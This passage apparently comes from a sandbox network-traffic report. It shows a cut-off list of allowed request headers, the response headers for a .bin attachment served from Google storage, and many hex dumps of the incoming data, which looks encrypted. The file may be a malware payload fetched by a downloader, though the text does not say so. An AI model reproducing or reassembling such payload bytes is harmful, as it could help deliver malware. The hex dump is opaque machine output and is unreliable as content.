X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="Entralent_Raw_HKLpdUcQg124.bin";filename*=UTF-8''Entralent_Raw_HKLpdUcQg124.bin Content-Length: 473664 Date: Mon, 30 May 2022 12:45:59 GMT Expires: Mon, 30 May 2022 12:45:59 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=gxarMg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2022-05-30 12:45:59 UTC	479	IN	Data Raw: 85 82 ae c4 b6 e6 4f 9a 9f 0e 3d fd 36 0f e7 72 0e 88 19 30 99 ca d1 f8 8b b2 12 e8 9f f3 6b a6 36 56 f3 99 1a 5f 89 55 67 8d bb d3 d6 58 8d b3 c8 a9 bc dd 95 04 fa bf ee 7d 9c 19 0e e3 bd f6 52 4e 1c 6e 5b 51 b5 5e 77 b1 9c 2e b8 36 db 3f ec cb 01 b8 45 d0 75 bc 18 32 cc 12 ac fe 2e 6c 22 b6 22 3a bf 90 91 3e 73 c3 2a 1b 5e 9d 12 d9 cd b7 69 6f f9 17 60 fa a4 88 af 6b 00 66 b3 39 dd 78 4e f3 17 11 74 8e b6 f0 64 36 f9 b2 bb 3e 96 eb 5b ff cb f1 f7 a5 0f b6 b9 e5 2e 8d c2 6c 9d f9 20 ef b0 6d 25 d4 e2 be a3 0e ba f4 1e 29 a5 dc 05 48 a5 29 e9 30 78 44 56 eb ae 33 1d 4c ae bf ed 4a cd e1 1f 86 2c 4d c9 d7 c6 62 5e 17 ff c4 37 6d 70 3e ab 76 8f 2b 70 37 83 a4 b2 9e 35 ca f9 73 6b 32 4f 16 73 d8 76 99 3c 9d 31 10 7c ea 14 d1 98 e7 6b 1d ac e5 54 35 f1 08 1b Data Ascii: O=6r0k6V_UgX}RNn[Q^w.6?Eu2.l"":>s*^io`kf9xNtd6>[.l m%)H)0xDV3LJ,Mb^7mp>v+p75sk2Osv<1\|kT5
2022-05-30 12:45:59 UTC	483	IN	Data Raw: fa 12 4c 77 9e dd c2 95 06 7a a3 c3 a5 dc d6 cb 5a e4 bb ac b3 77 94 d3 9e 9b cf 03 4b e4 39 41 9a ce 10 0e 77 6d c2 4b fd 61 98 72 16 31 f8 a5 b0 ba e2 38 36 22 da d3 ea c9 75 14 01 2a 7c 45 e5 34 71 3c d8 0a 6f 99 8c c0 82 a1 01 35 01 f4 61 ec 32 30 a4 88 66 b8 2e 3b dd 60 48 3a 32 d4 b5 2a 23 96 42 87 94 db 12 8e 32 61 03 6f 74 53 44 ee f4 dd 22 2f 3c 4b e3 6e 2c b1 9e fd 9a e1 59 57 c7 22 67 f7 70 b7 df 06 a8 67 ad e5 b9 13 d4 f3 7a 8b f3 84 27 45 66 45 e9 8e bd 5c fa 1f dd fe e6 c3 9d 7b 96 33 40 4f c8 e4 9e fb e1 24 69 7e 78 50 06 be 23 77 39 78 f6 d3 80 dd eb bb 6e d8 44 03 64 3a f9 3c 5d 36 50 fd ec 28 d0 71 eb 26 32 ed cf 24 36 a0 13 d7 4e c8 eb a2 6f 3f 80 fb 8f 2e de cd 71 90 25 0e ad 10 2f 93 29 a8 ab 4d 9e e1 c1 2e ff eb a7 85 c1 c0 6e 4a 3c Data Ascii: LwzZwK9AwmKar186"u\|E4q<o5a20f.;`H:2#B2aotSD"/<Kn,YW"gpgz'EfE\{3@O$i~xP#w9xnDd:<]6P(q&2$6No?.q%/)M.nJ<
2022-05-30 12:45:59 UTC	487	IN	Data Raw: 1f ce e1 fd 99 2b 2e 74 0d 20 89 75 df 81 35 ff 7c aa 9e b2 5a 5c 4d 66 43 08 91 59 70 8e 2c d4 b6 38 0a 3c 03 9a d3 8b 23 4e 1f 9b 4b 74 99 c8 62 8a ea e0 e0 9f 4a 30 9a 55 b5 0b 25 e6 17 df af 2b 2c c0 ab 40 7d 9c 55 5b 9d 37 15 32 47 c3 5b 2c 15 bb 54 80 71 b7 a3 a9 14 c1 07 e6 40 1b 0d 16 dc 31 a7 49 96 90 7d d7 14 ed 5b fc 8b 73 93 a9 e4 c6 a6 67 1c 05 e9 5a 82 10 1c 86 8d ba ca 6c 10 0d a0 13 bd d1 e4 5c 98 d7 e5 15 71 7d b2 1c 53 cf 00 3d 47 8a 90 f7 d2 b9 c2 d7 0f 2a fe d1 4c 63 d0 4c 15 09 87 cc 7e d1 a3 bb d5 2f a2 f1 19 4c cc 9c 80 7f a5 b7 1c e0 44 1b dd 1e 61 c7 5d 86 c3 0e f8 77 2f ef 13 40 73 64 7e ae a8 3c 46 8c 75 6d c0 24 39 80 b7 0d 33 fa 8d 67 61 94 9b 55 27 75 df 48 2f 34 ea e7 50 94 a3 a5 69 55 0f 86 c0 c0 08 62 42 cc f2 de bd c0 88 Data Ascii: +.t u5\|Z\MfCYp,8<#NKtbJ0U%+,@}U[72G[,Tq@1I}[sgZl\q}S=G*LcL~/LDa]w/@sd~<Fum$93gaU'uH/4PiUbB
2022-05-30 12:45:59 UTC	491	IN	Data Raw: 57 77 0d 20 c6 3a d2 17 eb ba 78 07 1c 41 a4 76 df 2d 58 45 9a 73 97 66 85 d4 49 51 0a 3a f6 3a cb 9d 74 6d 1f 10 36 25 f9 1c 75 f1 05 e0 6a 18 64 ba b0 ae 4a d5 3e b9 11 2a 0f 99 33 47 88 34 fe 3b 81 dc 28 7e 54 32 9d 43 ff 75 72 48 32 e3 74 6d ec 1b 68 d6 7e 2c d5 e4 d5 e9 36 f1 46 fb 4d 4b af ff 9f 14 5b 77 50 1f 3c 47 38 f6 80 8f da 0d e8 5a 82 37 b3 64 ee 36 10 bb b9 df bb bc 53 67 a5 6e 6f 28 e5 14 12 6e a7 6e 44 fc 16 52 8f 7d 41 94 50 31 12 5e 89 0a d2 30 09 2d e8 98 b1 16 41 2b 62 c3 5d 44 56 60 fa 17 31 c7 6c af b4 80 5c 90 3b bf a8 9e 69 e1 9e 3b 78 8c 5b 26 2a 44 fc ef 0b 40 6b 64 33 01 45 8d 5b e6 cd f3 83 45 2d e3 7c ec dd 17 f1 74 fa 83 e9 22 25 5c 0b ef ed 55 e2 12 50 ad 8f 02 f2 ba fe 72 3e 3f 85 ed ea 7c e3 fd 50 45 15 9f 77 8d 02 f1 21 Data Ascii: Ww :xAv-XEsfIQ::tm6%ujdJ>3G4;(~T2CurH2tmh~,6FMK[wP<G8Z7d6Sgno(nnDR}AP1^0-A+b]DV`1l\;i;x[&D@kd3E[E-\|t"%\UPr>?\|PEw!
2022-05-30 12:45:59 UTC	491	IN	Data Raw: 28 6d 1c c9 6e 2d 3a 53 fc 00 c4 43 8a 90 24 8d c9 fd 84 46 e0 16 3e a8 f6 37 b0 25 09 af af 2a 6a b4 3d b3 14 51 30 da 1c 4e d5 a6 f4 7e 38 27 98 eb d9 ca b1 ae 2c 4a 66 e2 fd c5 7c e8 ef 99 67 b2 bd 97 72 8c 01 b1 8f 0a 0f 34 88 ed 68 b3 04 bd b6 2a ab 4a 08 ba 2c fc 9b e1 2b e8 58 68 f0 d8 26 20 e8 a4 97 b7 72 f3 25 f7 16 99 30 2f 6e e8 a3 f5 b9 77 ff 85 6d c4 d5 87 e6 a0 e0 00 18 f5 07 e2 7a 42 eb 5d c1 4a 75 87 7e ee 09 4f 6a 21 bf 0c dd 5d d6 00 2d 8b 8e f3 a8 36 fc c6 5b bc 86 17 57 13 c3 03 51 b8 21 8b 3e 2c 03 ed 39 21 50 3f 0f f5 61 1f c8 a4 bf 77 84 10 0f 40 41 14 3d 40 c2 5f 3d a1 06 bc 0a 05 1f d4 d1 51 40 90 02 77 e8 a7 49 c9 fc 89 e5 c7 91 b0 a8 e2 23 d9 cf 62 d2 d1 7d 5c f7 2d 77 03 08 7e da 15 fb ad 1a 1e f8 23 65 6b fb 7a 6b 6f 53 3f ff Data Ascii: (mn-:SC$F>7%j=Q0N~8',Jf\|gr4hJ,+Xh& r%0/nwmzB]Ju~Oj!]-6[WQ!>,9!P?aw@A=@_=Q@wI#b}\-w~#ekzkoS?
2022-05-30 12:45:59 UTC	493	IN	Data Raw: 8d cc cd 44 17 0b 80 e9 2a 1f 19 2d 8a d3 f0 63 28 98 65 1c a6 cf 81 67 67 69 67 4c 06 29 60 a9 bc f2 07 72 c9 8d 2a f9 b5 83 d2 89 3d 23 46 df a5 09 95 14 5a a2 61 76 9d 0c 7f f2 d0 91 18 f9 2c 9b 47 15 6b 2f ae 4e 26 20 c0 66 d5 c9 0f 42 ef 69 0d 86 a8 3c 36 8d 49 64 10 29 38 5a 02 6d 92 11 21 1a 3c d7 1b 36 d3 81 7f 2c a1 b2 d9 b1 62 9e b2 2e c5 99 fe 40 97 c2 9b 2e df f1 da 2a e7 02 b7 f2 18 9b 1f dc 3a 2e 07 ef 9d ed f9 75 f0 31 0f 94 da 73 1a 7c 41 4a 2a 57 a1 74 26 a4 36 24 b4 92 95 c3 a8 45 85 fe 50 0b 64 9b 99 d1 f2 a5 9d a9 fb 2a 6d 57 9d 77 c1 8c 3c 5f 0b d5 d0 1a 8e 25 8b 8e 90 06 9c b8 71 6a b3 da 63 6d 72 3e 3d cc 37 1c bb 17 a5 7d 14 fd 48 ee b4 dc 36 06 a9 00 73 4a e5 b9 cd 78 ee 8b 24 66 02 8f 97 89 88 a4 d1 11 62 e0 c0 af 45 49 19 40 2a Data Ascii: D-c(eggigL)`r=#FZav,Gk/N& fBi<6Id)8Zm!<6,b.@.:.u1s\|AJWt&6$EPdmWw<_%qjcmr>=7}H6sJx$fbEI@
2022-05-30 12:45:59 UTC	494	IN	Data Raw: d4 b2 ce 7f 8b 95 ca c7 26 71 a4 23 ae b3 56 e4 6d b1 c3 cd 0e bd bf b8 ce 44 de 50 2f b3 04 ac 65 db f8 ca 1b 5e f7 82 55 1a 15 35 96 7e ed 36 14 1c e6 5a 96 de 52 61 e3 15 81 f9 74 35 3c 9e 23 61 e2 2a 99 3d ad 86 de 64 61 3b d5 43 66 3e fa 15 8a 50 12 9b 31 5d 2a c2 2b 5b 6e 33 9b f3 79 a3 c8 bd f7 d8 0e af 7d 84 09 03 3f 88 04 86 77 53 a0 30 35 4a 1e 32 d4 5b 01 98 4d 28 65 91 c4 bc 50 83 dc 07 a2 b0 32 16 06 3b b5 ae 5f 6e d0 6f df f8 81 5d 4d 78 bc df 1d c0 ad 91 27 25 30 4e 6a b5 11 48 dd b4 2b 23 38 61 36 b5 f2 ee 4f 3f 92 0c 1d 31 46 89 fc 02 3e f8 0a d0 2e d9 27 f1 3f 39 5d 5e ba 1a e4 18 d6 9b ac 6b 3a 94 08 2b 29 62 e5 98 7e df 38 33 d2 57 c3 5a 07 f2 13 07 f2 9f 32 91 e7 5f 37 c8 b1 2c 93 28 fe dc 0a 4f ee 85 3d e4 7d 1b e4 63 2a 18 81 12 e0 Data Ascii: &q#VmDP/e^U5~6ZRat5<#a=da;Cf>P1]+[n3y}?wS05J2[M(eP2;_no]Mx'%0NjH+#8a6O?1F>.'?9]^k:+)b~83WZ2_7,(O=}c*
2022-05-30 12:45:59 UTC	495	IN	Data Raw: 08 21 96 eb 66 c8 88 0c a8 3f fb 64 b3 8f 72 de 0a 02 30 cf fe c2 fe 40 7e ab 0e f6 d7 0f 8b b1 54 33 03 10 a2 9a 03 c4 08 62 d6 d3 28 c7 b8 b4 8c 68 60 01 06 a9 c8 9d 1c 3e a4 7e 01 1f 89 02 84 d6 eb 9f 21 48 29 6a 62 a2 c8 df ac c7 36 3b a5 06 b2 3d 5f 72 ba 72 b5 9e 8a 01 dd d2 1b 6d 7d 62 d3 93 14 f4 38 55 ac 36 26 5c 8e ba 8d 47 28 60 f2 1b 6b fa c7 cc 27 ca 77 e6 0b 61 03 00 50 c3 f0 4f b8 ca 42 06 9d 33 28 6a f8 28 3f 8c cf 54 b2 52 c9 8e ce 06 bf 29 a3 3c 39 c8 b2 ef 88 a6 e0 ab 56 87 ba e1 e7 ec fe 37 e9 49 2a 59 59 19 67 06 01 e0 f0 9c 3c 7c 11 3c 3a 20 e0 e9 9a e9 ed 9c a6 79 67 69 c2 42 b8 90 6e 5a cc 44 80 07 78 4f 18 22 6b 86 ab 8b 90 83 24 29 45 07 e5 e2 86 b6 c0 8b f4 03 f3 aa 2b b2 6f bb f7 7a a3 37 42 ab fc 75 25 42 db f7 17 fe 1f ab 35 Data Ascii: !f?dr0@~T3b(h`>~!H)jb6;=_rrm}b8U6&\G(`k'waPOB3(j(?TR)<9V7I*YYg<\|<: ygiBnZDxO"k$)E+oz7Bu%B5
2022-05-30 12:45:59 UTC	497	IN	Data Raw: 1d 6b b1 a6 a7 ca c7 3e a6 55 1f fa fb 10 05 b4 3d 49 3c c0 6d da 21 8b a9 13 aa bb 92 2a 93 63 36 3c c0 a8 da de 0a 32 17 e4 8d f1 c4 d4 31 1d 5a 16 5a e2 58 55 35 ed 18 07 3c 4f 3d 09 aa f5 b7 72 f1 8a 23 c7 84 10 7a cc 50 43 8a 7b 63 7b e0 01 30 2c 1d 51 05 5f 98 b3 ae ee 19 0b df 3f df 87 25 bc ad d3 75 bc 58 f0 c8 12 fd ad 78 e7 d3 85 f9 b3 e1 e8 a8 60 07 b5 37 73 b6 9e 12 d9 32 c1 09 90 ec a7 22 bf a4 77 e9 13 93 29 cb bc 13 13 b0 c6 59 d1 0f a0 1f 16 39 42 29 93 22 10 ff ec 5d 0c 55 86 1b 1b 06 ff 89 c0 4f 0b 76 cd 16 26 c1 66 88 94 9c d2 5a d9 8b 2e 16 70 83 f6 37 5b f0 0a 8a 24 67 fe 6c cf 98 03 c8 cf e2 b3 95 44 3f 55 da e2 20 6b 16 77 ca d0 36 7a e7 05 f8 74 5e f6 71 04 df 3a 2b 12 6a 8d 2b bb 4e bf 0d e7 17 89 7e b8 4c fb 35 be 2a 8f b3 c3 cd Data Ascii: k>U=I<m!c6<21ZZXU5<O=r#zPC{c{0,Q_?%uXx`7s2"w)Y9B)"]UOv&fZ.p7[$glD?U kw6zt^q:+j+N~L5
2022-05-30 12:45:59 UTC	498	IN	Data Raw: eb fa 96 42 49 80 af 30 af ff ca b3 80 9a ac 16 0c 36 14 a9 42 02 d0 09 13 6f b8 57 be ba 28 59 39 f3 d9 35 11 f8 49 fb 60 6c aa 1a ec 1c 27 18 20 9e 12 29 b9 06 8f ba d7 39 f1 95 af 8f fa db 9b 65 9a 79 43 e1 ac e1 a5 a1 0c 81 60 cf 36 b2 1d 2c 41 31 7c 4f 65 d0 90 d1 21 33 3f 18 91 63 4a ee 22 0e 48 23 ca 16 1e 01 a2 98 16 6a 33 66 8a 28 62 d2 4e 79 77 d9 c6 65 b4 81 11 4f 18 32 4c 9d 76 f9 3f 96 97 53 22 86 eb e4 96 51 f1 d6 ad 52 f0 5c 1f 20 b8 1e bc ef 10 12 a7 ae f1 f2 f3 95 4f 49 01 3b 02 ef c4 75 6e c4 5b 57 16 d5 46 37 e3 43 8f 12 ae e6 25 89 8e 14 cd df fc 5a 5c 4a 29 ac 7f 42 3f 92 43 54 6e d8 65 01 1a ba 83 a6 2f 9e da 77 c8 b2 67 2f fe 69 1b cb 61 98 46 f6 3c 58 cf 17 41 82 f8 7c 92 6f c4 80 24 58 ef 0a 32 d3 59 ea ea f8 b9 7f f0 b6 9a 7a b4 Data Ascii: BI06BoW(Y95I`l' )9eyC`6,A1\|Oe!3?cJ"H#j3f(bNyweO2Lv?S"QR\ OI;un[WF7C%Z\J)B?CTne/wg/iaF<XA\|o$X2Yz
2022-05-30 12:45:59 UTC	499	IN	Data Raw: 14 5b 03 3b 8c 4e f5 73 2b 2e 0b 3f e1 62 db 29 13 a1 a9 2b 4d 50 f7 ae c1 22 c2 4c 7b d5 a4 aa d5 eb 8d 71 da f3 3e 28 0b 5b f7 73 b8 d7 97 eb 15 f8 a0 94 10 aa 74 e9 49 80 7e 31 f0 b7 33 16 c6 de ed 6a 71 f9 10 56 73 8a 64 1b 4c 5e 08 2f 2c f8 03 75 dd 68 3f a4 7c 82 57 5e bc e7 5d 80 c1 27 65 f8 16 b7 5b 00 de 16 3d 26 d4 61 fa 2c d3 92 44 47 9c 6c 15 d0 3c 3e 20 b3 8c d6 fb bd ca a8 94 98 12 51 c9 27 4b e6 0b 47 ba e5 6c 8f 5d f0 b9 2c 5d 74 02 dc a7 8f 05 4e 5f c4 9e 1b e9 ef 63 44 d5 9d 86 3f 35 83 83 32 9f 61 cc 42 f8 29 5a a6 fd d7 75 33 15 b7 d7 15 f5 43 94 98 07 26 12 42 0d 58 6f b6 f4 7b 74 19 df f3 82 27 ab 5e 57 86 2c 56 75 89 db 96 29 c0 fd c0 a4 95 51 5b 2e b9 49 80 8e 13 72 8b 0a bf c2 52 8f f9 04 a1 e4 70 ca c7 b1 8d 4a 38 48 ba 87 75 5e Data Ascii: [;Ns+.?b)+MP"L{q>([stI~13jqVsdL^/,uh?\|W^]'e[=&a,DGl<> Q'KGl],]tN_cD?52aB)Zu3C&BXo{t'^W,Vu)Q[.IrRpJ8Hu^
2022-05-30 12:45:59 UTC	500	IN	Data Raw: cb 2c 64 a6 ef e4 b2 fa 27 4e 7b ea 4f 94 da 64 26 e7 ae 4a 0e fe fc 74 c6 57 0d 24 c0 14 46 4c 50 15 38 40 03 a7 cd 9c 7a 68 ee 68 6c 9b 1e f7 7c bf 78 b4 81 8c 3c a1 cb b6 82 bc d9 cd 34 ad 77 93 15 e3 16 bc 03 63 03 e0 ad f5 39 3b ba 14 02 e8 1b 3d 37 d1 48 df aa 24 d5 ef 00 46 99 7b 8f 39 76 52 7b 6e db f1 ae 5e a5 ac b1 dd 54 0f 5a 78 ba 7b bb c2 54 09 0a 73 f6 9d 63 c8 e5 37 c5 bb 9a 1b c5 0c 2c da fb e8 33 77 4c 59 91 5f 48 c4 bb 60 6c 40 61 3d af 8a c7 b7 79 45 47 3a f2 62 b4 bf 76 c9 12 80 a8 24 16 a6 55 73 f3 08 0b 3b 30 ed 8f d3 a7 cd de fa 2b 4c ee 42 13 2f c3 5b 38 8f f3 24 1e f8 70 f0 ed 0f 99 c1 c0 5f 83 9a a7 c4 e4 6b 49 fd e3 4c 0c b8 59 1d 18 49 3e 86 15 a3 24 f5 11 98 0e 73 fc bd 7b 9a b1 16 a2 ad fb 60 c4 36 49 57 e6 b2 93 c7 f6 fa 25 Data Ascii: ,d'N{Od&JtW$FLP8@zhhl\|x<4wc9;=7H$F{9vR{n^TZx{Tsc7,3wLY_H`l@a=yEG:bv$Us;0+LB/[8$p_kILYI>$s{`6IW%
2022-05-30 12:45:59 UTC	502	IN	Data Raw: a2 1e 3a 34 f6 df 9a 39 38 e3 7a 77 ba 99 7c 82 39 5c 07 06 6b 7b d1 aa 7f 8f f0 a7 a9 3e df a0 18 26 17 dd 52 eb 96 2c 02 22 4e b4 ff 1a d2 93 8c 4a 3c 77 da fc 00 37 5a d3 4a 89 fb 39 5d b4 8b 07 96 9b 5f 9a 49 4c c4 6b 04 f9 fe 22 75 6c 7c df 3c b9 1e 3f 8e 18 65 9e ab f0 f2 be 1e d6 3b e6 4f bc 41 e2 fd 4a 00 23 25 32 2a 53 e1 90 bb f7 71 a4 c2 08 89 d5 1f 30 20 cf 9c 03 36 4a 66 5b b7 22 c1 fa 07 b3 13 e1 cd 84 4a 7c 59 17 51 45 e9 37 a5 ff 75 e4 d6 12 4c cf b6 7f 38 6b e9 84 f5 50 3b 7b ab 0d e6 40 a4 e4 26 df b5 e1 f1 4f 02 65 aa 12 32 7f fa e7 7f 69 8c b1 46 c1 8b 36 fd 92 c2 7a 68 f9 f8 d8 97 75 e4 0c b1 d3 db 3a d8 90 84 61 ce 4b 62 c9 24 87 51 ca 9b fb 60 5c 24 46 ed 01 b7 f2 f1 75 74 d3 35 b8 ec 6f 7c 91 e8 8b 8b 91 c9 1d 14 8c ed b6 50 ba da Data Ascii: :498zw\|9\k{>&R,"NJ<w7ZJ9]_ILk"ul\|<?e;OAJ#%2*Sq0 6Jf["J\|YQE7uL8kP;{@&Oe2iF6zhu:aKb$Q`\$Fut5o\|P
2022-05-30 12:45:59 UTC	503	IN	Data Raw: 91 6d 16 f8 5a d1 51 54 90 00 77 e8 06 1b c9 fc 07 6e b3 01 c6 57 e7 23 a5 80 9a d4 4b a6 18 83 6e 12 ff c8 d1 cd 9e f8 d9 2b 44 b6 a3 06 01 f7 6b 57 93 6b 65 56 6b 99 ab d2 94 df 06 64 20 03 67 9b 1d ed 46 90 1f ee 33 bb 80 07 78 3f 18 34 0d 86 ab 8b 90 83 14 29 bf 60 e5 e2 30 ce 9f 00 11 34 31 2f 67 15 93 6b 0e ad 78 cc c9 30 41 9a 1a 4c a9 38 df f2 c3 e4 03 96 86 f6 77 fb b4 91 28 be 7c 47 de d0 c0 c4 67 7a f2 f0 94 70 31 56 be 4f 42 7a 66 ad 59 4b 5b 3a 9e a1 16 14 e7 bd f6 1d dd 7e 13 ba 0a 81 40 4f 1e 2b 90 e4 dc d6 46 35 b3 86 9a 78 06 f3 c9 c7 c8 16 85 10 2b 69 b9 cc 64 f5 f3 d9 8b 97 4a 6b a2 06 7a f0 ee e8 84 25 e5 9e 3a 77 8b 43 66 05 d3 ae 5c 6b 12 7f 4d 2c e5 4e d2 fb 50 80 e4 36 ca fc 4e 05 4e 4f 6c 9a 85 25 96 ea f7 50 0c 86 aa 9f c2 2e 98 Data Ascii: mZQTwnW#Kn+DkWkeVkd gF3x?4)`041/gkx0AL8w(\|Ggzp1VOBzfYK[:~@O+F5x+idJkz%:wCf\kM,NP6NNOl%P.
2022-05-30 12:45:59 UTC	504	IN	Data Raw: 72 bc a4 05 fa 63 95 2a 7f d1 8a 6e f4 fd 4e 2e b5 ab c0 e7 9a 85 64 6c fa 2e bd dd 7b 04 49 17 e5 3f e3 96 55 6e 07 4c 53 fc 6a 27 bd ff 85 d8 15 5e c0 d7 cd 2e 96 6b d8 4f c8 3e 24 c9 db cc cf dd 5e 44 db 6e e2 ce e2 b3 f6 d2 80 1e f1 f9 a6 94 e5 d7 3a 41 8d 39 a2 05 87 3f de b5 69 64 57 6b f2 d1 7e 25 69 08 cb c0 30 f3 08 71 36 ec 24 04 36 fa 66 23 60 81 cd 8f 2b 68 d2 3c 29 ed 7f 6e cc e2 ab 7f fe d7 27 ee 78 a8 7c fb dc f7 a1 28 c0 b6 02 9f d8 e8 4c be cb 5e 10 ec cd 3d 91 45 8e 35 bc 1b 30 91 a8 38 9a b1 16 78 6d e2 90 0a 18 49 16 72 2f 80 cf 2b 08 41 de 96 d7 01 22 fd ce c8 4c bc 78 3d 14 7d e3 32 6c 36 24 82 23 cf 22 50 50 5b f5 61 17 68 98 10 b8 ca 7e e2 13 61 87 d2 af 3c 23 2e ec 65 a2 63 bf 2c 87 7d c1 62 1b cc ad cb 89 30 c8 fc 75 a1 53 31 a3 Data Ascii: rc*nN.dl.{I?UnLSj'^.kO>$^Dn:A9?idWk~%i0q6$6f#`+h<)n'x\|(L^=E508xmIr/+A"Lx=}2l6$#"PP[ah~a<#.ec,}b0uS1
2022-05-30 12:45:59 UTC	505	IN	Data Raw: 93 01 fe 22 d2 6b 7c d2 79 13 a1 12 78 e5 89 84 aa 58 3f 88 98 11 1a b2 78 86 34 95 6d a2 2b 8f 84 c1 cb 00 b5 17 66 f8 e9 2a ae c9 d6 ff f7 7f 2c d6 fd 2d 38 f6 27 31 0f 9c 96 3d 90 2a 19 38 31 85 de cc ba c2 41 d9 13 c8 32 58 47 b9 94 38 f1 06 58 ad f3 ef 00 9f 89 b6 7f b0 18 45 5d b9 26 80 dc 6b 9e 2f e0 c0 ad 62 fb 9d d2 9d 99 eb bd 9b b9 e9 ee 8d 31 31 95 49 e6 63 d5 44 be c6 53 b4 f3 27 08 4a 7c bc ce 56 4e 95 cb 84 56 cd 03 86 61 14 f6 50 39 d4 39 61 41 6b f1 d2 5e 6f 3d 68 26 83 7b 06 bf 25 89 4e f5 bb 2d 39 12 83 4a 8b 91 4e 1e 14 8c 3d d5 15 91 62 23 3a d8 0a 67 99 8d 6a ab de 91 fa 00 d0 f0 7c 57 b6 e6 13 ac fe d1 18 06 8e af 76 9b fc c7 d6 5b 68 d5 e4 dd 71 0a 54 41 93 f1 6f f9 17 eb 0e f4 e0 ff b9 5e 67 4c 4d f7 23 0b 89 33 e1 95 f6 9e 49 65 Data Ascii: "k\|yxX?x4m+f,-8'1=81A2XG8XE]&k/b11IcDS'J\|VNVaP99aAk^o=h&{%N-9JN=b#:gj\|Wv[hqTAo^gLM#3Ie
2022-05-30 12:45:59 UTC	507	IN	Data Raw: 9b fd 89 41 d0 80 60 1d a3 61 e7 0f cd 33 b1 bc 74 71 58 f3 91 c9 1a f2 62 61 17 64 8b d7 00 f2 f1 7d 66 08 79 ff c7 6f a0 e7 07 56 a8 61 5b d4 11 cc 15 c3 64 77 6e 8c d0 60 73 74 6c 5a f1 a8 e4 fd db 9b 06 2f ef 0c 2a 53 9f f1 9b f6 58 ed 36 ed 76 c2 16 1b 1a 4d dd e3 ea b8 60 b9 c6 6f 5d 42 52 0c eb 40 c2 a5 d7 9b cc a8 a6 ef 9d c7 3a 56 07 39 f5 de c9 de a5 5e 55 93 aa 1b 17 8b f3 70 15 7c d8 0c 27 d6 36 a1 ff 13 5b 61 9f 1a 98 60 d8 5b 03 71 71 dd 46 a0 81 b2 de 04 e0 0d b8 41 16 db 2e e4 88 d6 bd 3a af 16 8b 89 c9 85 a6 c6 87 aa 3a a7 5d eb 15 97 9b 12 f9 5b 59 61 12 73 6f 56 5e 15 53 f5 34 30 7c 65 29 75 19 43 66 cb ff 45 d1 b1 4e 57 78 37 f4 f3 79 65 20 a4 60 bc 5e f1 bc d6 74 c5 ce 60 e6 02 40 ae 35 b0 d0 75 76 40 c7 1a 84 15 e2 df 47 e1 66 c0 ec Data Ascii: A`a3tqXbad}fyoVa[dwn`stlZ/*SX6vM`o]BR@:V9^Up\|'6[a`[qqFA.::][YasoV^S40\|e)uCfENWx7ye `^t`@5uv@Gf
2022-05-30 12:45:59 UTC	507	IN	Data Raw: 5b f6 7c da e9 65 ad 04 90 70 e7 65 92 ac 7a 6b 35 19 b1 70 c5 df 4c e9 94 7d 11 63 72 b1 34 fe 6f 6b 89 87 93 b7 d4 cf c1 c6 19 7f a0 da de 83 ab f9 5f 4b 14 4a 8e 59 5f 89 89 00 c3 fa ee a1 ba 69 c3 d8 82 83 74 9a 47 46 56 3f ec fb ad b3 56 bb 5b 3a dd 6e 53 f3 42 f8 61 5b 20 6c 5a 7f 15 fb de 76 d2 c4 67 9d 76 55 25 ab e6 8d c3 2a 6e 36 66 ad 3a c3 14 0d 89 e8 59 d1 b7 b3 bf 79 cb 61 ef 52 dc 4e bf 3d d9 f7 0d 49 20 35 34 47 44 b1 8d f4 5a 86 93 68 ba d1 51 81 86 99 3f be 16 04 40 02 6c 97 47 7d a2 06 d5 38 04 be 39 50 68 5e a6 bb 7d ed 76 71 5e 82 f5 b2 ed 0d 83 c4 5d 60 47 86 af 94 17 36 00 4a b1 fa 9d 48 86 c9 43 f7 96 6f 37 b5 08 a0 b2 90 da 6b e0 3c d1 aa 47 9a bd 0b 41 92 b2 b7 ca 93 65 af 5c 15 01 a2 8f 24 ec c0 ce 51 9a db ae 38 9e 88 cd f8 0a Data Ascii: [\|epezk5pL}cr4ok_KJY_itGFV?V[:nSBa[ lZvgvU%*n6f:YyaRN=I 54GDZhQ?@lG}89Ph^}vq^]`G6JHCo7k<GAe\$Q8
2022-05-30 12:45:59 UTC	509	IN	Data Raw: 3b 50 75 05 a3 ef fa 54 62 20 71 7c 78 d9 50 ba c2 52 0d 5a be ed a5 95 c8 b3 61 14 b3 51 c8 6c b4 d6 56 eb ae 65 96 0c a2 42 7f 0a 0c fe 1f c4 ed 52 cd 95 62 8a a2 05 07 89 f2 97 09 64 57 64 88 dd f2 60 9d ae a6 b0 cd 0c f7 27 d1 ee b3 04 36 c1 fe f9 b1 98 93 89 4b 4d ec 92 55 7c 93 e7 0d 2d 54 d9 fe 91 b2 11 2d 91 83 e8 17 ba d0 52 cd 47 74 25 74 e8 bb a9 c8 5e c2 bd c3 b8 ed 6e 02 65 2d d8 7f 1c d0 93 8d 89 46 f5 20 f5 34 1c c5 3d 19 73 21 14 cf 2d 53 65 0d fa de 01 a1 a2 bb dc 2f 20 f4 9f 14 f6 44 d2 9c 41 e8 0f 66 7c 36 9c df b5 c8 96 94 6c 9b 9b 74 47 b0 8e 67 8d 7e 15 d9 31 48 56 f4 ee 6e 65 fa 6d d3 5d b7 60 1b 24 e4 9e 9e 52 fa eb f2 22 97 79 a5 78 f5 a6 5a 0b 6e 72 17 43 d1 d0 b2 5e 70 bd 69 49 16 3c 26 5f 51 19 7b 72 ff f7 cc 94 6c 94 b7 fd f8 Data Ascii: ;PuTb q\|xPRZaQlVeBRbdWd`'6KMU\|-T-RGt%t^ne-F 4=s!-Se/ 